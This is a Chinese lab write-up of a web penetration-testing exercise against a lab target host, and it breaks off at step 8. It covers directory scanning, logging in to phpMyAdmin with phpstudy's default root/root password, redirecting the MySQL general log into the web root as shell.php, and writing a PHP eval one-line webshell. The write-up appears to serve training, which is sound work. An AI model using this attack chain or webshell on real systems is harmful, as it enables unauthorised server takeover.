实验1 web站点渗透测试1
实验准备
1、根据平台提供的靶机网址访问网站首页(10.0.26.10),首页界面如下图所示。
实验过程
2、使用目录扫描器御剑,对靶机站点进行目录扫描。发现目标站点下存在phpmyadmin目录以及一个info.php的文件。
3、访问info.php文件之后,发现其内容为php探针。通过php探针的信息,判断出该站点使用phpstudy搭建, 因 为 使 用phpstudy搭 建 的 站 点 默 认 存 在 该 探 针 文 。且获得网 站 的 绝 对 路 径 为“C:\phpStudy\PHPTutorial\WWW”3
4、访问phpmyadmin目录,使用phpstudy中mysql的默认密码(root/root)进行登录尝试,发现登录成功
5、因为以root权限登录了phpmyadmin且在步骤3已经通过php探针获取到了网站的绝对路径,所以接下来可以尝试利用日志文件来进行getshell。首先在sql处执行“SHOW VARIABLES LIKE 'general%'”查看是否开启日志功能以及日志文件的保存路径
6、由上图可知,“set global general_log = "ON";”开启mysql日志“setglobalgeneral_log_file='C://phpStudy//PHPTutorial//WWW//shell.php';”将日志文件的存储路径改为站点根目录下的shell.php 文件。
7、之后再执行sql语句“select ‘<?php @eval($_POST[1]);?>’”,向日志文件中写入php一句话木马。
8、之后在浏览器中访问mysql日志文件,